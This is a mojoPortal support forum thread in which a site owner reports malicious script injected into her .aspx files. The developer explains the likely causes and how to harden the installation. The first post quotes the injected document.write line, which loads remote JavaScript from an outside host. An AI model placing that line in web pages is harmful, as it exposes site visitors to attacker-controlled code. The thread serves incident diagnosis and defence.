Malicious Script Inserted on my Site

This is the place to report bugs and get support. When posting in this forum, please always provide as much detail as possible.

Please do not report problems with a custom build or custom code in this forum. If you are producing your own build from the source code and have problems or questions, ask in the developer forum, do not report it as a bug.

This is the place to report bugs and get support

When posting in this forum, please try to provide as many relevant details as possible. Particularly the following:

  • What operating system were you running when the bug appeared?
  • What database platform is your site using?
  • What version of mojoPortal are you running?
  • What version of .NET do you use?
  • What steps are necessary to reproduce the issue? Compare expected results vs actual results.
Please do not report problems with a custom build or custom code in this forum. If you are producing your own build from the source code and have problems or questions, ask in the developer forum.
This thread is closed to new posts. You must sign in to post in the forums.
11/25/2009 10:07:28 PM
Princesse
Gravatar
Total Posts 70
View Posts

Malicious Script Inserted on my Site

Hello Joe,

I open my website this morning and it prompt me an error in Default.aspx / the all aspx files have been inserted with this script.

document.write('<script src=http://mgy56.extra.hu/album/index.php ><\/script>');

I also notice before the loading of my website pages on the status bar I can see

              On mouse hover before I click the link was  http://mysite/dep-pros.aspx then after I clicked the link

              Waiting for mgy56.extra.hu... (Unknown to me)

              Transferring data from mgy56.extra.hu...(Unknown to me)

               Done

               It goes to the link page I clicked.

How can I clean / delete the inserted script on all files infected?

What can be done to avoid this instances.

 

Your help and reply will be greatly appreciated.

 

Thank you.

 

11/26/2009 8:09:10 AM
Joe Audette
Gravatar
Total Posts 18439
View Posts

Re: Malicious Script Inserted on my Site

It is difficult to know what happened without forensic analysis.

All I can guess is that your installation is not properly secured. There is no vulnerability in mojoPortal to allow scripts to be added unless the user has edit permissions and no-one else has reported this issue. My best guess is that your entire website folder is writable by anyone and someone managed to add malicious script into actual files on the server like /Default.aspx which hosts all the CMS pages. If your file system is not protected and some other site on the server gets infected it may be able to write to files in your mojoPortal installation. I would inspect the Default.aspx file in the root with a text editor and look for a script that should not be there. I would also review the mojoPortal log and if possible the server log to find clues about the attack.

Previously you were hosting potential malware content right in your site and it is possible that the bad guys were able to steal your cookies or your password or something. So if the attack did not come from another site on the server it could also be that someone was able to ftp into your site and modify or replace files.

The only folders that need to be writable are the /Data folder and the App_Data folder and these folders can be marked as not executable to harden the installation. No other folders should be writable.

Also if you have implemented custom features and not secured them properly then your custom features could be the entry point for this attack. For example there are no possibilities for sql injection attack in mojoPortal code because we use parameters and never concatenate user input into a sql statement. But if you did not follow good practices in your own coding then someone may exploit a sql injection vulnerability in your code and then write extra content into all the database tables with malicious content.

Hope it helps,

Joe

12/1/2009 3:15:10 AM
Princesse
Gravatar
Total Posts 70
View Posts

Re: Malicious Script Inserted on my Site



Hello,

 I deleted my existing mojoportal files and unzip my back up zip file and apply necessarry steps to build the correct structure of my site. The changes I noticed are:

 I did not see on my status bar

Waiting for mgy56.extra.hu... (Unknown to me)

Transferring data from mgy56.extra.hu...(Unknown to me)

You are right with my website folder settings they have the permission to read/write . I am doing necessary editions to make it read only(except /Data and the App_Data folder ).

I'll give you further update on this.

 

Again

 

Thank you.

7/28/2011 3:16:38 AM
Princesse
Gravatar
Total Posts 70
View Posts

Re: Malicious Script Inserted on my Site

Hi Joe,

 

Solution Suggestions:

I further test for sql injection for example in Blog\Edit.aspx. The user can input script on the textboxes(which should not be allowed). To resolved the Malicious Script Insertion I added RegularExpressionValidator on textboxes and allow only valid inputs.

 

Thank you.

 

Cesse

7/28/2011 6:03:08 AM
Joe Audette
Gravatar
Total Posts 18439
View Posts

Re: Malicious Script Inserted on my Site

There is no sql injection vulnerability in mojoPortal, you seem to confuse cross site scripting (entering javascript) with sql injection, they are not the same thing.

The blog is designed to be very powerful and allow users to enter javascript, the feature is not designed for letting strangers use it, it is designed for trusted users. This is true of most features in mojoPortal, they are designed for trusted content authors not for just letting anyone edit.

See "What mojoPortal is not Designed For" on the about page.

 

7/28/2011 10:58:59 PM
Princesse
Gravatar
Total Posts 70
View Posts

Re: Malicious Script Inserted on my Site

Hi Joe,

Sorry, I should used this instead "cross site scripting". 

Its true and you are correct that only Trusted Users are allowed to edit features in mojoPortal.

 

But we should also take into considerations that there are Users whose sole job is trying to hack/intrude

websites in any way/whatever way it is possible to them. 

 

Whats wrong with using RegularExpressionValidator? I just checked the validity of input on textboxes  

based on the ValidationExpression constrains I set. This is to avoid script on input fields that should not

contain script.

 

I may NOT possess the needed developer knowledge but that is why I'm asking for your guidance and suggestions.

 

Your help is greatly appreciated still!

 

Thanks.

 

Cesse

7/29/2011 6:13:32 AM
Joe Audette
Gravatar
Total Posts 18439
View Posts

Re: Malicious Script Inserted on my Site

It is not hacking if a user enters javascript in the blog, that is allowed by design because the blog is only for trusted content authors, the only users who can edit or "hack" in the blog are the ones you allow to edit and you should not allow strangers to use that feature as it was not designed for that as stated in the about mojoPortal page.

A good developer could clone the blog and make their own custom blog feature with less power and more restriction if they wanted to make the feature available to untrusted users.

This forum expects as a prerequisite that you have a background in ASP.NET development. I've answered a lot of posts from you already, it takes a lot of my time trying to help people. I'm very busy with my own work and I do not have time to help people who do not have that background when they want to make big changes to my code and don't know how to do it. In fact, in general I'm not interested in helping people fork mojoPortal code and I have been very consistent in telling people not to fork the code so I will not spend much time trying to help a junior developer do something I don't think they should do in the first place when they don't know how to do it themselves and don't understand the existing code. 

Once you start forking the code you are on the bad path and by yourself and your customer will not be able to upgrade to new versions of mojoPortal without losing your changes so you have done them a disservice in my opinion and eventually it will make your customer think badly of mojoPortal. So not only is it difficult to help you but it is a no win situation for me. 

[Edit]

To others reading this, you need to understand that parts of this conversation are on other threads by this user in the developer forum, such as this one. To clarify, the Report Bugs forum does not expect a background in ASP.NET, that is only expected in the Developer Forum, but this thread has not identified any bug in mojoPortal and the conversation is a continuation of posts from the Developer Forum.

8/1/2011 10:25:02 PM
Princesse
Gravatar
Total Posts 70
View Posts

Re: Malicious Script Inserted on my Site

Thanks for the replies Joe. Greatly appreciated it!

You must sign in to post in the forums. This thread is closed to new posts.